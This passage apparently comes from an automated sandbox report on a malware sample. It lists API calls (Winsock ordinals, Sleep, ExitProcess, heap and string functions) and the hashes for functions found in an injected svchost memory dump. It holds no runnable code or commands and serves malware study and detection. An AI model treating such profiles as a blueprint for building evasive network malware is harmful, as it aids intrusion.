                                                                                                                                                                                • Opcode Fuzzy Hash: 12f2c09409d24c4e054f6c672668061102ef24238b7d1e7e0faab0b08158be4f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B61D1B5A00326ABDF01DFE8CC81DEEB779EF41658F680425F505A7641EB74E940CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463B5
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 131463CF
                                                                                                                                                                                • #20.WS2_32(?,00000374,00000000,13161584,00000010), ref: 131463F7
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13146401
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13146413
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$ExitProcessSleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3372458563-0
                                                                                                                                                                                • Opcode ID: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction ID: f9d9d312b63715cea87f7def494aa1476285842a4910d48bf0ac6b79b102a875
                                                                                                                                                                                • Opcode Fuzzy Hash: d2f4072409005e6626f78853b55f4e55af6a4931fd5888f89c96aeb35619061e
                                                                                                                                                                                • Instruction Fuzzy Hash: 4421F2B29403A8AFDB20EFE48DC0E9A732CAB05758F150934F61A67185E774AE448B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000008,00000001,00000018,00000000,131511FA,00000008,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000), ref: 1314EAEE
                                                                                                                                                                                • #112.WS2_32(00000000,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000,00000002,00000000), ref: 1314EAFF
                                                                                                                                                                                • #22.WS2_32(00000000,00000002,00000000,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000,00000002,00000000), ref: 1314EB0A
                                                                                                                                                                                • #111.WS2_32(00000000,00000002,00000000,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000,00000002,00000000), ref: 1314EB0F
                                                                                                                                                                                • #3.WS2_32(00000000,00000000,00000002,00000000,?,1314DF75,76B7EA30,1314E310,?,00000000,00000000,-00000004,00000049,00000000,00000002,00000000), ref: 1314EB18
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: #111#112Read
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 938386388-0
                                                                                                                                                                                • Opcode ID: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction ID: 64597dc8f14b545119c056b7161341aca8f44151334267f50d9d632a3386f452
                                                                                                                                                                                • Opcode Fuzzy Hash: 55044d7a4f543ff3f87d1ad7e6e7f63179eb35737f05c55234fbd4be03901f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 45F06235601240ABCB225F1DDC89D0A77E9EFC3B01B680939F8D8AB214DB31A881CB71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNEL32(00007530,76B7EA30,00000000,00000000), ref: 1314D8B6
                                                                                                                                                                                  • Part of subcall function 13144EB1: EnterCriticalSection.KERNEL32(00000000,1314E300,?,00000000,00000000,-00000004,00000049,00000000,00000002), ref: 13144EBC
                                                                                                                                                                                  • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000004,00000000,00000000,131505F9,?,00000000,00000000), ref: 13144C42
                                                                                                                                                                                  • Part of subcall function 13144C2F: IsBadReadPtr.KERNEL32(00000000,00000001), ref: 13144C56
                                                                                                                                                                                  • Part of subcall function 13144C2F: HeapFree.KERNEL32(00000000,00000000), ref: 13144C6B
                                                                                                                                                                                • lstrlenA.KERNEL32(1314E202,?,?,?,?,?,00000000), ref: 1314D645
                                                                                                                                                                                • #12.WS2_32(00000000), ref: 1314D730
                                                                                                                                                                                • wsprintfA.USER32(?,-00000004,00000058,00000000,00000000), ref: 1314D756
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Read$CriticalEnterFreeHeapSectionSleeplstrlenwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2235084444-0
                                                                                                                                                                                • Opcode ID: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction ID: 85804d81a0b3f996cc8e3f993ce6150457bfc5b8273e19742008c52d7d2c31f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 51663f21bcf7e422acca725b706df896575aabc9a0bc1173ddc667c30757e91b
                                                                                                                                                                                • Instruction Fuzzy Hash: 7CA109B5A00265AFEB08EF58C9D0C6577F9FB0524C7688439E945D7316EB34E981CF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CharLowerA.USER32(00000000,131616E8,?,00000000), ref: 1314E8B5
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,?,-00000004,00000060,?,00000000,-00000004,0000005F,?,00000000,-00000004,0000005E,?,00000000,-00000004,0000005D), ref: 1314E9D5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharLower
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1615517891-0
                                                                                                                                                                                • Opcode ID: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                • Instruction ID: 55354aba79ba1874cd0fbe84286657b3d5da400f78d1ff2b94a4c4cac87821d8
                                                                                                                                                                                • Opcode Fuzzy Hash: e15f2f67250bf7c819582e290c9eaea27e66e80e3beb9cdf804c5e2b29c6ed88
                                                                                                                                                                                • Instruction Fuzzy Hash: 9E518076A04605EFDB21CF98C980E9AB7F9FF08314F284429E65AE7290D730F950DB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 1314AF1D
                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,00000000), ref: 1314AFDC
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,-00000004,00000082), ref: 1314AFFE
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00000000), ref: 1314B002
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrcpylstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2274183309-0
                                                                                                                                                                                • Opcode ID: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction ID: a74685481d463179f19788f7fab92f1dad1b175aa3379debd9faf6d6e193eef0
                                                                                                                                                                                • Opcode Fuzzy Hash: af2b05a22181a1154fb521f424507219b8dd8e098b67af918b9410bab3b45479
                                                                                                                                                                                • Instruction Fuzzy Hash: 343150B6A00219AFDB00DFA9CDC09AFB7F9FF48644B558479E556E3200E730EA41CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,00000000,00000000,76B26490), ref: 13151258
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 13151277
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,-00000004,0000004C,570000AF), ref: 131512B4
                                                                                                                                                                                • #21.WS2_32(?,0000FFFF,00001006,?,00000008,-00000004,0000004C,570000AF), ref: 13151333
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                • Instruction ID: eeaae9abf41def517d93f69b57e648ada73d6bba23f07fd8ba6a5e794752873d
                                                                                                                                                                                • Opcode Fuzzy Hash: a6407b1cd4d2954f65e7e183993cd6715576cc1c471be36c2dc44acfaac3818c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D3116B5A047419FC720DF5AC98194AFBF4FB09324B908A3EE5AAD7A90C770A544CF10
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • #9.WS2_32(00000019,?,00000000), ref: 1314BD2F
                                                                                                                                                                                • #21.WS2_32(1314CF5F,0000FFFF,00001005,?,00000004,-00000004,0000004B,00000000,00000019,?,00000000), ref: 1314BD78
                                                                                                                                                                                • #21.WS2_32(1314CF5F,0000FFFF,00001006,?,00000004,1314CF5F,0000FFFF,00001005,?,00000004,-00000004,0000004B,00000000,00000019,?,00000000), ref: 1314BD8B
                                                                                                                                                                                • #4.WS2_32(1314CF5F,00000002,00000010,1314CF5F,0000FFFF,00001006,?,00000004,1314CF5F,0000FFFF,00001005,?,00000004,-00000004,0000004B,00000000), ref: 1314BD98
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                • Instruction ID: bfc2101d7bc6df8bcd8ecf80e76a602450dde5e84ff1f9cab78317e6ca9cf96a
                                                                                                                                                                                • Opcode Fuzzy Hash: edb9acae06f361222555068b2b358c9c1b74db9419235bff203ff353452a2ee5
                                                                                                                                                                                • Instruction Fuzzy Hash: 74016979A40309BBEB11DBA8CC06EEFB7B9AF85700F100439F644AB190D7B0AA049B51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 1314737F
                                                                                                                                                                                • GetTickCount.KERNEL32(?), ref: 13147392
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 131473BF
                                                                                                                                                                                • wsprintfA.USER32(?,-00000004,00000084,?,?), ref: 131473E8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction ID: 22f063ee8376c6af03fe04f9f38c1742ffbcef6b8c4240f2c466d1715124cb51
                                                                                                                                                                                • Opcode Fuzzy Hash: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C0196B29002199FEF08EFF4CC85DD93BADEB04258F114022FA15D2154DB75D5848FA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13152BFD: __amsg_exit.LIBCMT ref: 13152C0B
                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 1315433B
                                                                                                                                                                                • __lock.LIBCMT ref: 1315434B
                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?,13156A78,0000000C,1315440F,?,13155485,?), ref: 13154368
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08,13156A78,0000000C,1315440F,?,13155485,?), ref: 13154393
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4129207761-0
                                                                                                                                                                                • Opcode ID: e12d1765d70a06c6ffa649bac0df2439d2bc161c8bb70098c611c4f1f0def508
                                                                                                                                                                                • Instruction ID: 841d950e54b799b83921e5adb6aed1b0e70aea622248ec8fdb6f22e4af3ebf93
                                                                                                                                                                                • Opcode Fuzzy Hash: e12d1765d70a06c6ffa649bac0df2439d2bc161c8bb70098c611c4f1f0def508
                                                                                                                                                                                • Instruction Fuzzy Hash: F0018E36F81731DBDB95AF6A95887897760BF03611F484115F430B7690DB386442CBD1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000001,00000000,13152F07,13152DA8,00000001,1315295F,?,00000000,00000000,?,?,?,13152A71,?,13152F22,?), ref: 13152B88
                                                                                                                                                                                  • Part of subcall function 13152A95: TlsGetValue.KERNEL32(00000000,13152B9B,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486), ref: 13152A9C
                                                                                                                                                                                  • Part of subcall function 13152A95: TlsSetValue.KERNEL32(00000000,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152ABD
                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 13152BAA
                                                                                                                                                                                  • Part of subcall function 13152F55: __calloc_impl.LIBCMT ref: 13152F63
                                                                                                                                                                                  • Part of subcall function 13152F55: Sleep.KERNEL32(00000000), ref: 13152F7A
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(00000000,13153CE0,1315291D,?,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152A34
                                                                                                                                                                                  • Part of subcall function 13152A27: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?,?,?,131520D2,0000000E), ref: 13152A4B
                                                                                                                                                                                  • Part of subcall function 13152AC7: GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569D8,0000000C,13152BD8,00000000,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152AD8
                                                                                                                                                                                  • Part of subcall function 13152AC7: GetProcAddress.KERNEL32(?,EncodePointer,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486), ref: 13152B0C
                                                                                                                                                                                  • Part of subcall function 13152AC7: GetProcAddress.KERNEL32(?,DecodePointer,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486), ref: 13152B1C
                                                                                                                                                                                  • Part of subcall function 13152AC7: InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B3E
                                                                                                                                                                                  • Part of subcall function 13152AC7: __lock.LIBCMT ref: 13152B46
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152BDA
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152BF2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread__calloc_crt__calloc_impl__lock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2539975944-0
                                                                                                                                                                                • Opcode ID: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction ID: 34a35ee0a2ee0b0f73b2b1eed6102eacb8e391b11be9a5fa08b7e9cf7a66c14b
                                                                                                                                                                                • Opcode Fuzzy Hash: adb725a9134938a95b1c836ee6b1e9ea189e50f410bd80173755e6f9bbf1f5cb
                                                                                                                                                                                • Instruction Fuzzy Hash: 82F0C237605772ABD73A2B79AC45ECA3BA49F076B1B15452AF834E70C0CF25D4438AB0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • __lock.LIBCMT ref: 131524BC
                                                                                                                                                                                  • Part of subcall function 1315246D: __mtinitlocknum.LIBCMT ref: 13152481
                                                                                                                                                                                  • Part of subcall function 1315246D: __amsg_exit.LIBCMT ref: 1315248D
                                                                                                                                                                                  • Part of subcall function 1315246D: EnterCriticalSection.KERNEL32(?,?,?,131520D2,0000000E,13156938,0000000C,13151FA7), ref: 13152495
                                                                                                                                                                                • ___sbh_find_block.LIBCMT ref: 131524C7
                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,13156998,0000000C,13152BEE,00000000,?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7), ref: 13152506
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,13152A71,?,13152F22,?,00000001,?,131523F7,00000018,13156978,0000000C,13152486,?), ref: 13152517
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 568605419-0
                                                                                                                                                                                • Opcode ID: f58e1755293160f1002cdce4609a87691e82f113ad09d145b0cf43435aaf03ee
                                                                                                                                                                                • Instruction ID: a14f81d0e6afd0b26f5cca17c86cd6e71ecad54a2d1094fc1621cce35ebd326f
                                                                                                                                                                                • Opcode Fuzzy Hash: f58e1755293160f1002cdce4609a87691e82f113ad09d145b0cf43435aaf03ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 4301DB77A01316EBDB255FB59918BCD37A8EF03366F148428F430A71C0CF34A142DA54
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 131472FB
                                                                                                                                                                                • GetTickCount.KERNEL32(?), ref: 1314730E
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 1314733B
                                                                                                                                                                                • wsprintfA.USER32(?,-00000004,00000085,?,?), ref: 1314735E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction ID: bd6bd433622d16bfb8a7ed934dcb1d9e70c68623f8fc179dd0aa0ea7f68c250e
                                                                                                                                                                                • Opcode Fuzzy Hash: 9b8cba2e2565f2633aaa26bbdea80ebef9a999678d94bc7ba9552831924f8386
                                                                                                                                                                                • Instruction Fuzzy Hash: EA0162B2900229AFEF08EFF4CC85EDA3B6DEB04258F014022F915E3154DB74D9848FA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000), ref: 131478E7
                                                                                                                                                                                • lstrlenA.KERNEL32(?,00000079,00000078,00000077,00000076,00000072,00000073,00000075,00000074,00000000,?,?,00000000), ref: 131479A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1659193697-0
                                                                                                                                                                                • Opcode ID: 508208f6b48045fba1e456f585f0fe3029db14e724e2c2f86d0be0ba6c30f520
                                                                                                                                                                                • Instruction ID: bddbb8e60e0b475d97608fbd01a64d81e0d8181d6ceab40f40745229b72359d3
                                                                                                                                                                                • Opcode Fuzzy Hash: 508208f6b48045fba1e456f585f0fe3029db14e724e2c2f86d0be0ba6c30f520
                                                                                                                                                                                • Instruction Fuzzy Hash: 9581E175A0438A9FDB21CF78CC90BEE3BA5AF51304F3C4069E8658B242E775D546CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414B0,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AD3
                                                                                                                                                                                • StrStrA.SHLWAPI(?,131414AC,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AEC
                                                                                                                                                                                • CharUpperBuffA.USER32(?,00000001,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150AFC
                                                                                                                                                                                • CharUpperBuffA.USER32(00000001,00000001,?,-00000004,-00000008,?,?,13145A2C,-00000004,?,?,?,?,00000000,76B7EA30), ref: 13150B06
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: BuffCharUpper
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3964851224-0
                                                                                                                                                                                • Opcode ID: cac2271bce1c7a5be2a505c8dc1182aaa1f4a2a84aed33ccd525dde226beaaba
                                                                                                                                                                                • Instruction ID: 5bb8689f86a75521ef6ffb99572be13ba89833a3ffc7a46d895dc7a07a151006
                                                                                                                                                                                • Opcode Fuzzy Hash: cac2271bce1c7a5be2a505c8dc1182aaa1f4a2a84aed33ccd525dde226beaaba
                                                                                                                                                                                • Instruction Fuzzy Hash: 885139B5A00249EFD711DFACC980DAABBF9FF59308B644469F894E7201D731AA50CB90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(05615230,13161EF0,00000000,05615228,05615228,?,1314CD65,?,13161EF0,131616E8), ref: 131518EE
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(05615230,?,1314CD65,?), ref: 131518FB
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(05615230,131616E8,?,1314CD65,?), ref: 1315190E
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,131616E8,?,1314CD65,?), ref: 13151927
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction ID: 079bf1789869fdfda7f0d76e75eebd716d75c14f98fc5ce676a7518e497409ae
                                                                                                                                                                                • Opcode Fuzzy Hash: caab4dd3995b537a3e7fe88bb2e5526481f7b060322a23dbf6b07f2b764f47e7
                                                                                                                                                                                • Instruction Fuzzy Hash: 7221AC75200205EFC709CF55C48495AB7BAFF8A324B25807DE5679B311C730F981CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,1314B99F,?,00000000,-00000004,0000003B,?,00000000,00000000,00000000,?,1468EC68,1314CEB3), ref: 1315153A
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1468EC68,1314CEB3,?,?,?,?,?,?,?), ref: 13151548
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,131616E8,?,1468EC68,1314CEB3,?,?,?,?,?,?,?), ref: 1315155D
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,000003E8,0000000C), ref: 13151597
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.690483910.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2978645861-0
                                                                                                                                                                                • Opcode ID: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction ID: a61f007b530fa145b951fee3529638bfdb7bb09819d3071aa21f2857e0bba9e4
                                                                                                                                                                                • Opcode Fuzzy Hash: 52f5398c6f4f577c8c4e76fa03d76cbf28ba0f649fac66cf99410e3d807f1ade
                                                                                                                                                                                • Instruction Fuzzy Hash: 23016D756143519FCB32DF6ACDC4806B7E9AB4A2617050C39F557D3211C730E844CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13145417: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314333E,00016AF0,LoadLibraryExA,?), ref: 1314542F
